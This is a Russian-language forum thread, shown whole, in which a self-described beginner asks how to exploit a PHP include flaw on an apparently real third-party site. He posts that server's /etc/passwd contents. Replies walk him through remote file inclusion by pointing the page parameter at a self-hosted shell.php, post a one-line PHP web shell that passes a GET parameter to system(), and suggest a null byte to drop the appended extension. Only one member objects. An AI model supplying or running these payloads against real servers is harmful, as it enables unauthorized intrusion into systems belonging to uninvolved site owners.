Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2
RSS
проблема с PHP include
 
вот когода я прочитал директорию etc/passwd я увидел вот это:

root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/: news:x:9:13:news:/usr/lib/news: uucp:x:10:14:uucp:/var/spool/uucppublic: operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games: ftp:x:14:50::/home/ftp: smmsp:x:25:25:smmsp:/var/spool/clientmqueue: mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/: gdm:x:42:42:GDM:/var/state/gdm:/bin/bash pop:x:90:90:POP:/: nobody:x:99:99:nobody:/:

И что мне с этим делать?Подскажи чайнику в этом деле плиз :)
 
Цитата
Shanker пишет:
Хотя вряд ли у тебя такой навороченый шелл

Ну да,шелл у меня конечно не такой уж и навороченный,но пользоваться можно,хотя иногда пользуюсь готовым :)
 
Так как на счёт Паролей? :?:  :)
 
в etc/passwd хранятся учетные записи всех пользователей, а сами пароли хранятся в файле etc/shadow в виде хеш значений
 
Цитата
etc/shadow
В линуксе - да, во Free bsd - нет :)
Цитата
Кстати,как посоветуете,кодить свой веб-шелл или пользоваться уже готовым?
У меня ощущение, что свой накодить ты не в состоянии (судя по вопросам, извини, если обижаю) ... пользуйся тем, что найдёшь :)


Цитата
http://examplesite.hu/eng/index.php?page=dsdsds
Выдало Warning: include(/var/www/www.examplesite.hu/eng/page/dsdsds.php)
Как минимум в конце скрипт сам подставляет .php О чём нам это говорит ? На удалённом сервере должен быть файл
Код
mysite.ru/shell.php
а в строке ты запрашивать должен
Код
http://examplesite.hu/eng/index.php?page=http://mysite.ru/shell
. Смотрим что выдаёт, есть ли фильтры, не отключена ли в php.ini подгрузка удалённых файлов (скорее всего отключена).

ps
Включаем мозги
Изменено: Stierus - 30.09.2008 15:33:42
 
http://ru.wikipedia.org/wiki/Passwd
 
Ну шелл кодить я в состоянии,но правда я ещё пока не настолько хорошо знаю php,но шелл пробовал кодить,работал,но правда не такой уж он был и крутой этот шелл :) Тогда покачто придёться пользоваться готовым шеллом! :)

А за инфу всем огромное спасибо!Буду изучать!
 
Скажите,насколько я понимаю если он добавляет  сам в конец расширение .php это значет что стоит фильтр?или просто php код просто напросто имеет функцию чтоб в конец добавлять .php :?:
 
А если в конец он дописывает .inc  :?:
 
последние вопросы не понел )
шелл:
Код
<h1><pre><?system(@$_GET["c"]);?></pre></h1>
 
Цитата
redbu11 пишет:

                                                               Скажите,насколько я понимаю если он добавляет  сам в конец расширение .php это значет что стоит фильтр?или просто php код просто напросто имеет функцию чтоб в конец добавлять .php

А ты как думаешь, что это значит ?:)

Цитата
А если в конец он дописывает .inc
Промолчу, дабы не переходить на мат
Изменено: Stierus - 28.11.2008 14:54:50
 
Мдясь ...

Вопрос к тем кто  прокоментил.
Зачем  :?  

Хотелось бы понять все для чего, у человека  появились знания от ответов,появилась хотя бы логика?
 Сайт называется seclab   а не хак,  у человека даже не хватило ума составить  вопрос , так  что бы это было с точки  зрения безопастности , он банально спрашивает  как СДЕЛАТЬ  ггггг , человеку  который возможно даже не виновен , что его проект вел программист с кривыми руками  или уставший и запарный  в следствии чего допустил ошибки.
 Я бы понял бы  если консультировать родственника, или человека который действительно читает ман, а не тот  который   посмотрел ролик с хакер ру    и пошел тупо выполнять   теже действия , думая что это ключ от интеренета  =)))


PS: Вроде бы серьезный  ресурс, ИХМО те кто не понимают пускай лучше читают , ищут ,нельзя разводить демогогию с такими,другой зашедшщий увидит  ХАЛЯВУ начнут  так ж кричать ХАЛЯВА,ХАЛЯВА,ХАЛЯВА  и ресурс превратится  просто в  помоику, если  не хватает денег сделайте банеры  разошлите по  личкам  куда щелкать ,  я готов просто банально щелкать , но что бы оставался  ресурс именно достоинный а, не для халявщиков.
 
Цитата
Stierus пишет:
А ты как думаешь, что это значит ?

Ну я думаю что это php код просто в конец дописывает .php
 
Ты точно уверен, что
Цитата
Как минимум в конце скрипт сам подставляет .php
(моя цитата)
Значит
Цитата
Ну я думаю что это php код просто в конец дописывает .php
(твоя цитата)

Ты хорошо подумал, может, всё-таки, что-нибудь другое ? :)
Изменено: Stierus - 03.10.2008 10:43:53
 
Цитата
Stierus пишет:
Ты хорошо подумал, может, всё-таки, что-нибудь другое ?

Ну ты же сам сказал что это php скрипт добавляет,или я ошибаюсь?
 
redbu11, я занимаюсь php 4 год, и до настоящего момента не пытался ничего ломать (хотя считаю себя не плохим знатоком в этой области), так вот, советую бросить это гиблое дело и уделить больше внимания ИБ. Ломать всегда было проще а защитить эт наука целая:)
 
Цитата
и до настоящего момента не пытался ничего ломать (хотя считаю себя не плохим знатоком в этой области)
А как ты можешь считать себя знатоком того, чего ещё ни разу не делал? о_О

ps
А вдруг я знаток в области маникюра, ну или, хотя бы, отличный метатель телефонов.
 
я тут одну вещь вроде не увидела может плох четала коменты но тут ваще речи даже небыло об нулевом байте который бы помог откинуть расширение которое прикрепляецо скриптегом если конечно там у админа руки крюки то оноб тож во многом помогло "/
Страницы: Пред. 1 2
Читают тему